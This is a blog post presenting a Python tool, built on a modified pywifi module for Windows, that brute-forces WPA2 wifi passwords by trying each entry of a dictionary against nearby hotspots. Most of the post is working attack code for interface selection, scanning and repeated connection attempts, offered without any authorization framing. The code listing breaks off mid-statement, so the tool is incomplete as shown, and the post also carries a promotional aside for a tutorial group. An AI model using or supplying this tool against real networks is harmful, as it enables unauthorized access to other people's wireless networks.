Using Python as a hacker to brutally crack wifi password

Keywords: Python network Programming Windows

The first few articles mainly introduced the knowledge of using delphi to develop back door and simple remote control. Some partners said delphi was out of date and nobody used it. But I think programming language is just a way to realize functions, just use the language you are familiar with or like.

DELPHI hacker programming (1): implementation of forward and back door principle
DELPHI hacker programming (2): implementation of rebound back door principle
DELPHI hacker programming (3): implementation of simple remote control principle

In the recent project development of the company, I have come across some knowledge about Python language and wifi. I just want to share what I have learned with you. Also note: whether you are for Python employment or hobbies, remember: project development experience is always the core. If you don't have the latest Python introduction to advanced practical video tutorial in 2020, you can go to the small Python exchange : you can find a lot of new Python tutorial projects under the transformation of "seven clothes, nine seven buses and five numbers" (homophony of numbers). You can also communicate with the old driver for advice!

0x0001 development environment:

windows 10+python2.7.15

0x0002 development objective:

Develop a dictionary based tool to crack wifi hot password

During the development of this tool, the author has found some projects on the Internet, but they are all under linux and can not be directly used for windows platform, so he decided to modify them to be operable under windows combined with the projects found under linux.
First find the article "a very easy to understand WIFI password explosion python script" https://my.oschina.net/Apathy/blog/821039 But in the article, pywifi module is used, "this module is a bit weak under win. The author did not package WLAN" security "attributes when calling WLAN API, so it is recommended to run under linux. Kali 2.0 comes with python 2.7.6, which can be installed directly through pip install pywifi." However, the author found that it can still run under windows, because the source code of this module needs to be modified, so there is no module installed, but directly copy the source code of the module to the project directory.

0x0003 module modification:

When using the test case provided by the module, it is found that print outputs a lot of useless information, so the call to "show my need info" is removed from line 335 of "WiFi util win. Py".

0x0004 program execution process

The functional requirements are clear, so our steps are as follows:
1. Get local wireless card information
2. Scan around wifi hotspots
3. Try to connect wifi hotspot using dictionary
4. Output scan results

Follow the above process to write code.

0x0005 code implementation

Get wireless network information

After referencing the module, the interface function is mainly used to obtain the local wireless network card information. The specific code is encapsulated as follows:

def get_wifi_interface():
    wifi = PyWiFi()
    if len(wifi.interfaces()) <= 0:
        print u'Wireless card interface not found!'
        exit()
    if len(wifi.interfaces()) == 1:
        print u'Wireless card interface: %s'%(wifi.interfaces()[0].name())
        return wifi.interfaces()[0]
    else:
        print '%-4s   %s'%(u'Serial number',u'Network card interface name')
        for i,w in enumerate(wifi.interfaces()):
            print '%-4s   %s'%(i,w.name())
        while True:
            iface_no = raw_input('Please select network card interface serial number:'.decode('utf-8').encode('gbk'))
            no = int(iface_no)
            if no>=0 and no < len(wifi.interfaces()):
                return wifi.interfaces()[no]

Scan around hot spots

The scan results are obtained mainly through the scan function. The specific code is encapsulated as follows. Here, sleep(2) is because it takes some time for the local wireless network card to return information during the test. Of course, if your network card has good performance, you can remove this sleep:

def scan(face):
    face.scan()
    time.sleep(2) 
    return face.scan_results()

Try to connect (crack password)

To crack the password, first define a Profile, then call connect as a parameter to try to connect. Use the status function to get the return value of the connection result. If it is const.IFACE_CONNECTED, the connection is successful, and the result is displayed. If it is other, it is a failure.

def test(i,face,x,key,stu,ts):
    showID = x.bssid if len(x.ssid)==0 or x.ssid=='\\x00' or len(x.ssid)>len(x.bssid) else x.ssid
    key_index = 0
    while key_index < len(key):
        k = key[key_index]
        x.key = k.strip()
        face.remove_all_network_profiles()
        profile = Profile()
        profile.ssid = x.ssid
        profile.auth = const.AUTH_ALG_OPEN
        profile.akm.append(const.AKM_TYPE_WPA2PSK)
        profile.cipher = const.CIPHER_TYPE_CCMP
        profile.key = x.key
        face.connect(face.add_network_profile(profile))
        code = -1
        t1 = time.time()
        now = time.time() - t1
        while True:
            time.sleep(0.1)
            code = face.status()
            now = time.time()-t1
            if now>ts:
                break
            stu.write("\r%-6s| %-18s| %5.2fs | %-6s %-15s | %-12s"%(i,showID,now,len(key)-key_index,k.strip(),get_iface_status(code)))
            stu.flush()
            if code == const.IFACE_DISCONNECTED :
                break
            elif code == const.IFACE_CONNECTED:
                face.disconnect()
                stu.write("\r%-6s| %-18s| %5.2fs | %-6s %-15s | %-12s\n"%(

Posted by QbertsBrother on Wed, 29 Apr 2020 20:49:33 -0700